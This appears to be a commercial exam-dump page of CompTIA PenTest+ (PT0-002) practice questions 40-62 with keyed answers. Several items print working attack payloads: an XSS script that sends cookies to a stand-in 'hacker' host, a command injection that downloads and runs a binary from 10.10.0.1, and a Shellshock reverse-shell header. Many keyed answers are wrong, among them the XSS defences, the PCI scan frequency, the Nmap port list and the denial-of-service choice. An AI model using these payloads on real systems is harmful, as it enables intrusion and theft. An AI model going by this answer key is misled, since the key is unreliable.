• Home
  • Articles
  • PT0-002 Dumps PDF New [2021] Ultimate Study Guide [Q40-Q62]

PT0-002 Dumps PDF New [2021] Ultimate Study Guide [Q40-Q62]

Share

PT0-002 Dumps PDF New [2021] Ultimate Study Guide [{qanumstr}]

PT0-002 Exam Dumps PDF Updated Dump from  PDF4Test Guaranteed Success

NEW QUESTION 40
A penetration tester obtained the following results after scanning a web server using the dirb utility:
...
GENERATED WORDS: 4612
---- Scanning URL: http://10.2.10.13/ ----
+ http://10.2.10.13/about (CODE:200|SIZE:1520)
+ http://10.2.10.13/home.html (CODE:200|SIZE:214)
+ http://10.2.10.13/index.html (CODE:200|SIZE:214)
+ http://10.2.10.13/info (CODE:200|SIZE:214)
...
DOWNLOADED: 4612 - FOUND: 4
Which of the following elements is MOST likely to contain useful information for the penetration tester?

  • A. info
  • B. about
  • C. index.html
  • D. home.html

Answer: B

 

NEW QUESTION 41
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT> Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

  • A. Session tokens
  • B. Base64 encoding
  • C. Output encoding
  • D. Input validation
  • E. Web-application firewall
  • F. Parameterized queries

Answer: A,F

 

NEW QUESTION 42
A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the version number of the service. Which of the following methods would BEST support validation of the possible findings?

  • A. Test with proof-of-concept code from an exploit database
  • B. Manually check the version number of the VoIP service against the CVE release
  • C. Utilize an nmap -sV scan against the service
  • D. Review SIP traffic from an on-path position to look for indicators of compromise

Answer: C

 

NEW QUESTION 43
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Which of the following commands should the penetration tester run post-engagement?

  • A. chmod 600 /tmp/apache
  • B. taskkill /IM "apache" /F
  • C. rm -rf /tmp/apache
  • D. grep -v apache ~/.bash_history > ~/.bash_history

Answer: C

 

NEW QUESTION 44
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer:

Explanation:

 

NEW QUESTION 45
A penetration-testing team is conducting a physical penetration test to gain entry to a building. Which of the following is the reason why the penetration testers should carry copies of the engagement documents with them?

  • A. As backup in case the original documents are lost
  • B. To validate the billing information with the client
  • C. As proof in case they are discovered
  • D. To guide them through the building entrances

Answer: C

 

NEW QUESTION 46
A penetration tester has been given eight business hours to gain access to a client's financial system. Which of the following techniques will have the highest likelihood of success?

  • A. Attempting to tailgate an employee going into the client's workplace
  • B. Performing spear phishing against employees by posing as senior management
  • C. Dropping a malicious USB key with the company's logo in the parking lot
  • D. Using a brute-force attack against the external perimeter to gain a foothold

Answer: D

 

NEW QUESTION 47
A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

  • A. Wait for the next login and perform a downgrade attack on the server.
  • B. Use an FTP exploit against the server.
  • C. Capture traffic using Wireshark.
  • D. Perform a brute-force attack over the server.

Answer: C

 

NEW QUESTION 48
A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

  • A. Monthly
  • B. Annually
  • C. Weekly
  • D. Quarterly

Answer: C

 

NEW QUESTION 49
A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee's birthday, the tester gave the employee an external hard drive as a gift. Which of the following social-engineering attacks was the tester utilizing?

  • A. Tailgating
  • B. Baiting
  • C. Phishing
  • D. Shoulder surfing

Answer: B

 

NEW QUESTION 50
Which of the following BEST describes why a client would hold a lessons-learned meeting with the penetration-testing team?

  • A. To discuss the findings and dispute any false positives
  • B. To ensure the penetration-testing team destroys all company data that was gathered during the test
  • C. To provide feedback on the report structure and recommend improvements
  • D. To determine any processes that failed to meet expectations during the assessment

Answer: D

 

NEW QUESTION 51
You are a penetration tester running port scans on a server.
INSTRUCTIONS
Part 1: Given the output, construct the command that was used to generate this output from the available options.
Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Answer:

Explanation:
Part 1 - nmap 192.168.2.2 -sV -O
Part 2 - Weak SMB file permissions

 

NEW QUESTION 52
A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

  • A. Aircrack-ng
  • B. Wireshark
  • C. Kismet
  • D. Wifite

Answer: A

 

NEW QUESTION 53
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.
Which of the following actions should the tester take?

  • A. Create a detailed document of findings before continuing with the assessment.
  • B. Halt the assessment and follow the reporting procedures as outlined in the contract.
  • C. Perform forensic analysis to isolate the means of compromise and determine attribution.
  • D. Incorporate the newly identified method of compromise into the red team's approach.

Answer: A

 

NEW QUESTION 54
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

  • A. nmap 192.168.1.1-5 -PA22-25,80
  • B. nmap 192.168.1.1-5 -PS22-25,80
  • C. nmap 192.168.1.1-5 -Ss22-25,80
  • D. nmap 192.168.1.1-5 -PU22-25,80

Answer: B

 

NEW QUESTION 55
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"} Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  • A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • B. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • C. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}

Answer: C

 

NEW QUESTION 56
A penetration tester who is performing a physical assessment of a company's security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?

  • A. Tailgating
  • B. Badge cloning
  • C. Dumpster diving
  • D. Shoulder surfing

Answer: C

 

NEW QUESTION 57
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

  • A. PsExec
  • B. Alternate data streams
  • C. PowerShell modules
  • D. MP4 steganography

Answer: A

 

NEW QUESTION 58
Appending string values onto another string is called:

  • A. concatenation
  • B. compilation
  • C. connection
  • D. conjunction

Answer: A

 

NEW QUESTION 59
Which of the following should a penetration tester consider FIRST when engaging in a penetration test in a cloud environment?

  • A. Whether the country where the cloud service is based has any impeding laws
  • B. Whether the specific cloud services are being used by the application
  • C. The geographical location where the cloud services are running
  • D. Whether the cloud service provider allows the penetration tester to test the environment

Answer: C

Explanation:
Section: (none)
Explanation

 

NEW QUESTION 60
A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?

  • A. nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan
  • B. nmap -vv sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan
  • C. nmap -vv sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan
  • D. nmap -vv sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan

Answer: B

 

NEW QUESTION 61
A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment. Which of the following could be used for a denial-of-service attack on the network segment?

  • A. Ping flood
  • B. Smurf
  • C. Fraggle
  • D. Ping of death

Answer: B

 

NEW QUESTION 62
......

Pass Your CompTIA Exam with PT0-002 Exam Dumps: https://www.pdf4test.com/PT0-002-dump-torrent.html

PT0-002 Exam Dumps - CompTIA Practice Test Questions: https://drive.google.com/open?id=1tNQlCBVke_Xhjis2IthyZBSh5QmZ9F7i 

Related Articles

more
CompTIA PT0-002 Certification Practice Exam

PDF4Test will provide you with the valid test questions and test answers to help you pass certification actual test smoothly.

Latest dump torrent

Useful Links

Contact Us

Our Working Time: ( GMT 0:00-15:00 )
From Monday to Saturday

Support: Contact now 

If you have any question please leave me your email address, we will reply and send email to you in 12 hours.

Copyright © 2026 PDF4Test NETWORK CO.,LIMITED. All Rights Reserved. All trademarks used are properties of their respective owners. Privacy Policy